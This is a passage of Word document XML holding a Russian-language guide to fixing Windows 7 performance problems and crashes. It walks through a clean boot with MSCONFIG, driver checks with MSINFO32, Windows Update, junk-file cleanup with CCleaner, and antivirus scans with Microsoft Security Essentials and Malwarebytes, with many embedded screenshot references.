                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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2069092" cy="1375200"/>
            <wp:effectExtent l="19050" t="0" r="7358" b="0"/>
            <wp:docPr id="98" name="Рисунок 24" descr="http://kompkimi.ru/wp-content/uploads/2012/03/MSCONFIG-480x318.png">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kompkimi.ru/wp-content/uploads/2012/03/MSCONFIG-480x318.png">
                      <a:hlinkClick r:id="rId273"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId274" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2069282" cy="1375326"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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В закладке Общие снимите флажок – </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Загружать элементы автозагрузки</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а затем перейдите на вкладку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>– Сервис</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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2220150" cy="1463268"/>
            <wp:effectExtent l="19050" t="0" r="8700" b="0"/>
            <wp:docPr id="97" name="Рисунок 25" descr="http://kompkimi.ru/wp-content/uploads/2012/03/tools-480x318.jp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kompkimi.ru/wp-content/uploads/2012/03/tools-480x318.jpg">
                      <a:hlinkClick r:id="rId275"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId276" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2220257" cy="1463339"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Затем проверьте флажок на </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Скрыть все службы Microsoft </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и нажмите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Отключить все</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> .Нажмите кнопку Применить и перезагрузите компьютер.</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После перезагрузки компьютера,вы увидите, решен вопрос или нет . Если да, то вернитесь к MSCONFIG и первым делом идите на вкладку – Автозагрузка и сделайте первый запуск элемента и перезагрузите систему. Вы должны сделать ту же процедуру, пока вы не найдете, какие службы или элементы автозагрузки вызывают крах системы. </w:t>
      </w:r>
      <w:r w:rsidR="008634D0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>может занять некоторое время, чтобы узнать, какая из служб не работает, но не рекомендуется постоянный запуск системы в – Выборочный запуск</w:t>
      </w:r>
      <w:r w:rsidR="008634D0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008634D0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">отому что </w:t>
      </w:r>
      <w:r w:rsidR="008634D0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">он </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>не исправляет, а устраняет неполадки, чтобы найти виновного, который является причиной несоответствия системы.</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2219095" cy="1475471"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="96" name="Рисунок 26" descr="http://kompkimi.ru/wp-content/uploads/2012/03/Startup-480x319.jp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kompkimi.ru/wp-content/uploads/2012/03/Startup-480x319.jpg">
                      <a:hlinkClick r:id="rId277"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId278" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2219474" cy="1475723"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="008634D0" w:rsidP="00DF11FF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Большинство </w:t>
      </w:r>
      <w:r w:rsidR="00DF11FF" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>вопросов, связанных с производительностью могут быть решены на этом шаге.</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b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обновление драйверов:</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Устаревшие драйвера могут привести к сбою системы ,так что это хороший шаг, чтобы сохранять драйверы устройств в актуальном состоянии. Вы можете найти точную модель драйверов устройств и проверить версию и дату драйвера ,для этого можно использовать файл MSINFO32.</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В в поле поиска меню Пуск введите </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MSINFO32</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и жмите Enter.</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1363350" cy="972559"/>
            <wp:effectExtent l="19050" t="0" r="8250" b="0"/>
            <wp:docPr id="95" name="Рисунок 27" descr="http://kompkimi.ru/wp-content/uploads/2012/03/run.jpg">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kompkimi.ru/wp-content/uploads/2012/03/run.jpg">
                      <a:hlinkClick r:id="rId279"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId280" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1365113" cy="973817"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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szCs w:val="24"/>
        </w:rPr>
        <w:t>Вот как выглядит MSINFO32 , выберите каждое не Microsoft устройство и на правой боковой панели вы найдете модель устройства, версию и дату драйвера и т.д. Как только вы найдете имя драйвера, дату и версию ,идите на веб-узел изготовителя и в соответствующем разделе скачайте драйвер и установите его.</w:t>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2500950" cy="1567365"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="799" name="Рисунок 28" descr="http://kompkimi.ru/wp-content/uploads/2012/03/MSINFO32.png">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kompkimi.ru/wp-content/uploads/2012/03/MSINFO32.png">
                      <a:hlinkClick r:id="rId281"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId282" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2502799" cy="1568524"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не используйте обновления Windows или сторонних приложений для автоматического обновления драйверов, потому что большую часть времени обновления Windows или любое из сторонних приложений не найдут последние и лучшие драйвера, которые могут привести к сбою системы даже вызвать синий экран.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Совет:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> Если драйвера вызывают на дисплее вопросы или отставание, связанные с производительностью, лучше обновить или переустановить соответствующие драйверы с сайта производителя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Система технического обслуживания:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Система обслуживания является важным моментом при устранении неполадок, связанных с проблемой производительности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Центр обновления Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> : важно, обновлять операционную систему на регулярной основе,так как бывает много обновлений, что позволит решить вопросы повышения безопасности системы. Не стесняйтесь, чтобы запустить обновление. Если у вас есть некоторые ошибки при обновлении или, если обновление не удается запустить с Microsoft ,используйте инструмент </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t xml:space="preserve">System Update Readiness Tool. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Microsoft выпустила инструмент</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>System Update Readiness Tool</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> для решения определенных условий, что может привести к установке обновлений и другого программного обеспечения,которое не работает должным образом. Вам не нужно вручную запускать этот инструмент. Этот инструмент автоматически соединяет компьютер с Центром обновления Windows с условием, что инструмент может решить проблемы производительности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cleaning Junk Files</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">: программа не может выглядеть как большой шаг к решению таких вопросов как производительность системы, но поверьте мне, есть много ситуаций, когда эта программа делает свое дело. Существует встроенное средство очистки в </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Windows 7</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> , которое поможет вам удалить временные файлы и т.д., но я бы порекомендовал бесплатную программу, которая называется </w:t>
      </w:r>
      <w:hyperlink r:id="rId283" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="auto"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Ccleaner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> . Она удаляет временные и неиспользуемые файлы из вашей системы – позволяя Windows работать быстрее и освобождая место на жестком диске. Она также очищает следы вашей деятельности в Интернете, такие как интернет-историю.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1952695" cy="1782460"/>
            <wp:effectExtent l="19050" t="0" r="9455" b="0"/>
            <wp:docPr id="798" name="Рисунок 13" descr="http://kompkimi.ru/wp-content/uploads/2012/03/CCleaner-480x437.jpg">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kompkimi.ru/wp-content/uploads/2012/03/CCleaner-480x437.jpg">
                      <a:hlinkClick r:id="rId284"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId285" cstate="print">
                      <a:lum bright="40000" contrast="-40000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1955440" cy="1784966"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="af3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Вы можете или не можете использовать очистку реестра, эту или любую другую программу очистки реестра . Это не принесет никакой пользы для вашей операционной системы, может даже повредить систему. Решение конечно же за вами! Проверьте одну моих статей для получения дополнительной информации </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Очистка и дефрагментация реестра,реально может помочь?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Поиск вирусов:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> Чаще всего вредоносные троянские инфекции могут привести к нестабильному поведению вашей операционной системы. Выполните полную проверку на вирусы и убедитесь, что ваш компьютер чист. Есть много бесплатных антивирусных программ. Я бы порекомендовал </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Security Essentials, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>имеет очень низкий отпечаток системы и меньше ложных срабатываний.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1953750" cy="1524754"/>
            <wp:effectExtent l="19050" t="0" r="8400" b="0"/>
            <wp:docPr id="797" name="Рисунок 14" descr="http://kompkimi.ru/wp-content/uploads/2012/03/Microsoft-Security-Essentials-480x374.jpg">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kompkimi.ru/wp-content/uploads/2012/03/Microsoft-Security-Essentials-480x374.jpg">
                      <a:hlinkClick r:id="rId286"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId287" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1953719" cy="1524730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Затем скачайте бесплатные версии </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t xml:space="preserve">Malwarebytes </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">или </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>Emsisoft Anti-Malware 6.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> и выполните полное сканирование в безопасном режиме. Если вы обнаружили инфекцию и не можете удалить ее, вы можете использовать форму комментариев ниже, что бы задать вопрос , и я постараюсь ответить на ваши вопросы о безопасности системы ,я буду более чем рад помочь вам решить вашу проблему.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF11FF" w:rsidRPr="00617AC0" w:rsidRDefault="00DF11FF" w:rsidP="00DF11FF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1939068" cy="1476000"/>
            <wp:effectExtent l="19050" t="0" r="4032" b="0"/>
            <wp:docPr id="796" name="Рисунок 15" descr="http://kompkimi.ru/wp-content/uploads/2012/03/Malwarebytes-480x366.jpg">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kompkimi.ru/wp-content/uploads/2012/03/Malwarebytes-480x366.jpg">
                      <a:hlinkClick r:id="rId288"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId289" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1941006" cy="1477475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
